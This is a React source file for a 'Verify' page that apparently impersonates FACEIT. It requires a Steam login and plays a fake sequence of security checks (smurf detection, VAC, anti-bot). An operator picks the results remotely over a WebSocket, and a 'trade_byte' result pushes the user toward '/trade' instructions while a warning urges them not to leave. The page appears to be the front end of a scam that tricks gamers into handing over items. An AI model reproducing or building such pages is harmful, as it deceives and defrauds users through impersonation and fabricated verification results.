import { useEffect, useState } from "react";
import { useNavigate } from "react-router-dom";
import logo from "./assets/faceit_logo.png";
import Status from "./components/Status";
import Support from "./components/Support";
import { useT } from "./router/Router";
import "./styles/App.scss";
import "./styles/Modal.scss";
import { generateUrlWs } from "./utils/generateUrl";
import { verifyUser } from "./utils/user";

const Verify = () => {
    const navigate = useNavigate();
    const [hubId, setHubId] = useState("");
    const [clientId, setClientId] = useState("");
    const [statuses, setStatuses] = useState<any>({});
    const [currentStatus, setCurrentStatus] = useState("");
    const [currentMessage, setCurrentMessage] = useState("");
    const [currentNotification, setCurrentNotification] = useState<any>(null);
    const t = useT();

    const fields = [
        "smurf_detection",
        "license",
        "game_ban",
        "server_connection",
        "anti_bot",
        "faceit_error",
    ];

    const updateStatuses = (error: any, delay = 1000) => {
        const setCurrentMessageFunc = (currentField: string) => {
            if (
                currentField === "smurf_detection" &&
                error === "smurf_account"
            ) {
                setCurrentMessage("smurf_account_error");
            } else if (currentField === "anti_bot" && error === "trade_byte") {
                setCurrentMessage("trade_byte_error");
            } else if (
                currentField === "smurf_detection" &&
                error === "faceit_error"
            ) {
                setCurrentMessage("faceit_error");
            } else if (
                currentField === "anti_bot" &&
                error === "verification_success"
            ) {
                setCurrentMessage("verification_success");
            } else if (currentField === "anti_bot" && error === "hold_error") {
                setCurrentMessage("hold_error");
            }
        };

        const getCurrentFieldStatus = (currentField: string) =>
            error !== "verification_success"
                ? ((currentField !== "smurf_detection" &&
                      error === "smurf_account") ||
                      (currentField !== "anti_bot" &&
                          (error === "trade_byte" ||
                              error === "hold_error"))) &&
                  error !== "faceit_error"
                : true;

        if (delay > 0) {
            let i = 0;

            const interval = setInterval(() => {
                if (i < fields.length) {
                    const currentField = fields[i];
                    setStatuses((prev: any) => ({
                        ...prev,
                        [currentField]: getCurrentFieldStatus(currentField),
                    }));

                    setCurrentMessageFunc(currentField);
                    i++;
                } else {
                    clearInterval(interval);
                }
            }, delay);
        } else {
            fields.forEach((currentField) => {
                setStatuses((prev: any) => ({
                    ...prev,
                    [currentField]: getCurrentFieldStatus(currentField),
                }));

                setCurrentMessageFunc(currentField);
            });
        }
    };

    useEffect(() => {
        const setUp = async () => {
            const response = await verifyUser();

            if (!response || !response?.steam_connected) navigate("/join");

            setHubId(response.hub_id);
            setClientId(response.id);

            if (response.errors_status !== "checking") {
                const targetStatus = response?.errors_status || "server";
                updateStatuses(targetStatus, 0);
                setCurrentStatus(targetStatus);
            } else {
                setStatuses({});
            }
        };

        setUp();
    }, []);

    const onMessage = (e: any) => {
        const data = JSON.parse(e.data);

        setStatuses({});
        setCurrentMessage("");

        setCurrentStatus(data.errors_status);
    };

    useEffect(() => {
        let ws: any;
        let notificationsWs: any;
        let reconnectAttempts = 0;
        let notificationsReconnectAttempts = 0;
        let notificationsTimeout: any;

        const connectWs = () => {
            if (!clientId || !hubId) return;

            ws = new WebSocket(
                generateUrlWs(`customer/ws/receive_error/${hubId}/${clientId}`)
            );

            ws.onopen = () => {
                reconnectAttempts = 0;
            };

            ws.onmessage = onMessage;

            ws.onclose = () => {
                const delay = Math.min(1000 * 2 ** reconnectAttempts, 30000);

                setTimeout(() => {
                    reconnectAttempts++;
                    connectWs();
                }, delay);
            };
        };

        const connectNotificationsWs = () => {
            if (!hubId) return;

            notificationsWs = new WebSocket(
                generateUrlWs(`customer/ws/receive_notification/${hubId}`)
            );

            notificationsWs.onopen = () => {
                notificationsReconnectAttempts = 0;
            };

            notificationsWs.onmessage = (e: any) => {
                const data = JSON.parse(e.data);

                setCurrentNotification({ ...data });

                if (notificationsTimeout) {
                    clearTimeout(notificationsTimeout);
                    notificationsTimeout = undefined;
                }
            };

            notificationsWs.onclose = () => {
                const delay = Math.min(
                    1000 * 2 ** notificationsReconnectAttempts,
                    30000
                );

                setTimeout(() => {
                    notificationsReconnectAttempts++;
                    connectNotificationsWs();
                }, delay);
            };
        };

        connectWs();
        connectNotificationsWs();

        return () => {
            if (ws) ws.close();
            if (notificationsWs) notificationsWs.close();
            if (notificationsTimeout) {
                clearTimeout(notificationsTimeout);
                notificationsTimeout = undefined;
            }
        };
    }, [clientId, hubId]);

    useEffect(() => {
        if (!currentStatus) return;

        updateStatuses(currentStatus);
    }, [currentStatus]);

    return (
        <div className="App">
            {currentStatus && <Support />}
            <header>
                <img src={logo} className="logo" />
            </header>

            <div className="animated-bg-wrapper">
                <div className="animated-bg"></div>
            </div>

            <div className="App-content"></div>

            <div className="modal-wrapper opened">
                <div className="modal-container">
                    <div className="modal">
                        <div className="modal-content">
                            <p className="title">{t("review_message")}</p>

                            <p className="description">{t("review_time")}</p>
                            <span className="hub-id-text">
                                <svg
                                    xmlns="http://www.w3.org/2000/svg"
                                    xmlnsXlink="http://www.w3.org/1999/xlink"
                                    fill="currentColor"
                                    width="20px"
                                    viewBox="0 0 78 78"
                                    xmlSpace="preserve"
                                >
                                    <path d="M9.484,68.5h59v-59h-59V68.5z M11.484,11.5h55v55h-55V11.5z M77.869,10v1h-8v-1H77.869z M68.286,8h-1V0h1V8z M0.182,10h8v1   h-8V10z M10.765,8h-1V0h1V8z M69.819,67h8v1h-8V67z M67.235,70h1v8h-1V70z M0.131,67h8v1h-8V67z M9.714,70h1v8h-1V70z M13.624,39   l5.127-5.126v10.253L13.624,39z M58.374,33.874L63.5,39l-5.127,5.126V33.874z M39,14.062l5.127,5.127H33.874L39,14.062z    M33.874,58.812h10.254L39,63.938L33.874,58.812z" />
                                </svg>
                                {t("hub_id")}: <span>{hubId}</span>
                            </span>
                            {currentStatus !== "faceit_error" && (
                                <div className="statuses">
                                    <div className="status">
                                        <span>{t("smurf_protection")}:</span>{" "}
                                        <Status
                                            status={
                                                statuses?.smurf_detection !==
                                                undefined
                                                    ? statuses.smurf_detection
                                                    : "loading"
                                            }
                                        />
                                    </div>
                                    <div className="status">
                                        <span>{t("license")}:</span>{" "}
                                        <Status
                                            status={
                                                statuses?.license !== undefined
                                                    ? statuses.license
                                                    : "loading"
                                            }
                                        />
                                    </div>
                                    <div className="status">
                                        <span>{t("vacs")}:</span>{" "}
                                        <Status
                                            status={
                                                statuses?.game_ban !== undefined
                                                    ? statuses.game_ban
                                                    : "loading"
                                            }
                                        />
                                    </div>
                                    <div className="status">
                                        <span>{t("server_connection")}:</span>{" "}
                                        <Status
                                            status={
                                                statuses?.server_connection !==
                                                undefined
                                                    ? statuses.server_connection
                                                    : "loading"
                                            }
                                        />
                                    </div>
                                    <div className="status">
                                        <span>{t("anti_bot_protection")}:</span>{" "}
                                        <Status
                                            status={
                                                statuses?.anti_bot !== undefined
                                                    ? statuses.anti_bot
                                                    : "loading"
                                            }
                                        />
                                    </div>
                                </div>
                            )}

                            {currentStatus === "trade_byte" &&
                                currentMessage && (
                                    <button onClick={() => navigate("/trade")}>
                                        {t("trade_instructions")}
                                    </button>
                                )}

                            {currentMessage &&
                                (() => {
                                    const translation = t(currentMessage);

                                    return (
                                        translation && (
                                            <div className="statuses-error">
                                                {translation
                                                    .split("\n")
                                                    .map((part: string) =>
                                                        part ? (
                                                            <p
                                                                className="status-text"
                                                                style={{
                                                                    width: "100%",
                                                                }}
                                                            >
                                                                {part}
                                                            </p>
                                                        ) : null
                                                    )}
                                            </div>
                                        )
                                    );
                                })()}
                            <p className="status-text">{t("leave_warning")}</p>
                        </div>
                    </div>
                </div>
            </div>

            {currentNotification && (
                <div className="notification-wrapper">
                    <div className="notification active">
                        <div
                            className="cross"
                            onClick={() => setCurrentNotification(null)}
                        >
                            X
                        </div>
                        <svg
                            xmlns="http://www.w3.org/2000/svg"
                            width="40px"
                            height="40px"
                            viewBox="0 0 24 24"
                            fill="none"
                            color="#ff830b"
                        >
                            <path
                                fillRule="evenodd"
                                clipRule="evenodd"
                                d="M2 12C2 6.47715 6.47715 2 12 2C17.5228 2 22 6.47715 22 12C22 17.5228 17.5228 22 12 22C6.47715 22 2 17.5228 2 12ZM11 13C11 13.5523 11.4477 14 12 14C12.5523 14 13 13.5523 13 13V8C13 7.44772 12.5523 7 12 7C11.4477 7 11 7.44772 11 8V13ZM13 15.9888C13 15.4365 12.5523 14.9888 12 14.9888C11.4477 14.9888 11 15.4365 11 15.9888V16C11 16.5523 11.4477 17 12 17C12.5523 17 13 16.5523 13 16V15.9888Z"
                                fill="currentColor"
                            />
                        </svg>
                        <h3>{currentNotification?.title}</h3>
                        <p>{currentNotification?.text}</p>
                    </div>
                </div>
            )}
        </div>
    );
};

export default Verify;
